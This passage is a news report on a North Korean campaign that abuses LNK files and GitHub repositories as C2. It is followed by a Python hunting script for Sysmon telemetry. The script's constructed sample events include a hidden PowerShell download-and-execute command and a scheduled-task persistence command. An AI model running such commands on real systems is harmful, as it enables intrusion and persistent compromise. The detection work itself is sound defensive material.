GitHub as C2: Researchers also highlighted the campaign's use of GitHub as a command-and-control (C2) layer. Rather than communicating with suspicious-looking or newly registered domains, the malware interacts with GitHub repositories and the GitHub API to receive instructions and exfiltrate data, so its traffic blends in with legitimate developer activity.

"The fact that this shortcut file creates a chain that ultimately reaches out to a GitHub repository, and pulls scripts over the internet, should put network defenders on alert that even productivity platforms can be attack vectors," Boote added.

After infecting a system, the PowerShell scripts run anti-analysis checks to confirm the environment is not a sandbox or analyst machine, establish persistence across reboots through a scheduled task, and collect detailed system information. Only then do subsequent scripts attempt a stable connection to the attacker's GitHub repository, from which additional modules and instructions are fetched.

The researchers flagged a GitHub account, "motoralis", with consistent activity dating back to 2025, and other, less active accounts, including "God0808RAMA", "Pigresy80", "entire73", "pandora0009", and "brandonleeodd93-blip". The blog post also shared a set of URLs and file hashes to support detection efforts.
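The chain described above (a shortcut launches a hidden PowerShell that pulls scripts from GitHub, then registers a scheduled task for persistence, then keeps talking to GitHub for tasking) leaves a recognisable trail in endpoint telemetry. The following hunting script is an added example written for this page; it is not code from the CSO Online article or from the researchers it cites. It applies three heuristics to Sysmon-style process-creation (EventID 1) and network-connection (EventID 3) records: a script host whose command line carries a GitHub URL or hidden/encoded flags, a schtasks.exe /create whose action runs a script host, and any process other than known developer tooling connecting to GitHub hosts. The records, repository name, task name and the "developer tooling" allow-list are constructed assumptions for illustration, not indicators from the campaign.

```python
"""
Hunting heuristics for an LNK -> hidden PowerShell -> GitHub-C2 chain.
Added example for this page, not code from the article or the researchers.
The event records below are constructed; their field names mirror Sysmon
(Image, ParentImage, CommandLine, DestinationHostname) but the values are invented.
"""
import re
from typing import Dict, List

# Hosts a GitHub-backed C2 would talk to (raw file delivery, REST API, releases/gists).
GITHUB_HOSTS = {
    "github.com", "api.github.com", "raw.githubusercontent.com",
    "objects.githubusercontent.com", "gist.githubusercontent.com",
}

# Assumption: binaries for which GitHub traffic is normal on a developer workstation.
# Tune this allow-list to your own environment.
DEV_TOOLING = {"git.exe", "gh.exe", "code.exe", "chrome.exe", "msedge.exe", "firefox.exe"}

# Interpreters commonly launched by a malicious shortcut.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")
# Flags that hide the window, skip the profile, bypass execution policy or pass an encoded command.
EVASIVE_FLAGS = re.compile(
    r"(?:^|\s)-(?:w(?:indowstyle)?\s+hidden|nop(?:rofile)?\b|e(?:nc|ncodedcommand)?\s"
    r"|ep\s+bypass|executionpolicy\s+bypass)",
    re.IGNORECASE,
)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def github_hosts_in(command_line: str) -> List[str]:
    """GitHub hostnames referenced by URLs inside a command line (sorted, de-duplicated)."""
    hosts = {m.group(1).lower() for m in URL_RE.finditer(command_line)}
    return sorted(h for h in hosts if h in GITHUB_HOSTS)


def classify(evt: Dict) -> List[str]:
    """Return the list of heuristic findings for one event (empty list means benign)."""
    findings: List[str] = []
    image = basename(evt.get("Image", ""))
    parent = basename(evt.get("ParentImage", ""))
    cmd = evt.get("CommandLine", "")

    if evt["EventID"] == 1:  # process creation
        if image in SCRIPT_HOSTS and github_hosts_in(cmd):
            findings.append("script host fetching from GitHub")
        if image in SCRIPT_HOSTS and EVASIVE_FLAGS.search(cmd):
            findings.append("hidden/encoded script host")
            if parent == "explorer.exe":
                # A double-clicked .lnk runs its target as a child of explorer.exe.
                findings.append("hidden script host launched from Explorer (shortcut-like)")
        if image == "schtasks.exe" and "/create" in cmd.lower() \
                and any(host in cmd.lower() for host in SCRIPT_HOSTS):
            findings.append("scheduled task launches script host")
    elif evt["EventID"] == 3:  # network connection
        dest = evt.get("DestinationHostname", "").lower()
        if dest in GITHUB_HOSTS and image not in DEV_TOOLING:
            findings.append(f"non-developer process {image} connecting to {dest}")
    return findings


def hunt(events: List[Dict]) -> List[Dict]:
    """Run classify() over a batch and keep only the records that produced findings."""
    return [{"RecordId": e["RecordId"], "Findings": f}
            for e in events if (f := classify(e))]


# Constructed sample telemetry (not real campaign data; repo and task names are hypothetical).
SAMPLE_EVENTS = [
    {"RecordId": 1, "EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -nop -w hidden -ep bypass -c \"iex (New-Object Net.WebClient)"
                    ".DownloadString('https://raw.githubusercontent.com/hypothetical-user/hypothetical-repo/main/stage2.ps1')\""},
    {"RecordId": 2, "EventID": 1, "Image": r"C:\Windows\System32\schtasks.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'schtasks.exe /create /sc onlogon /tn "HypotheticalUpdateCheck" '
                    r'/tr "powershell.exe -w hidden -f C:\Users\Public\update.ps1" /f'},
    {"RecordId": 3, "EventID": 3, "Image": r"C:\Program Files\Git\cmd\git.exe",
     "DestinationHostname": "github.com"},
    {"RecordId": 4, "EventID": 3, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "DestinationHostname": "api.github.com"},
    {"RecordId": 5, "EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "powershell.exe"},
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit["RecordId"], "->", "; ".join(hit["Findings"]))
```

On the constructed batch, records 1, 2 and 4 are flagged and the interactive PowerShell session and git.exe traffic are not. The third heuristic is the one that turns GitHub-as-C2 against the attacker: on most endpoints the set of processes that legitimately reach api.github.com or raw.githubusercontent.com is small, so an allow-list plus the published URL and hash indicators gives a low-noise hunt even though the destination domain itself is reputable.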
First seen on csoonline.com
Jump to article: www.csoonline.com/article/4154471/north-korean-hackers-abuse-lnks-and-github-repos-in-ongoing-campaign.html

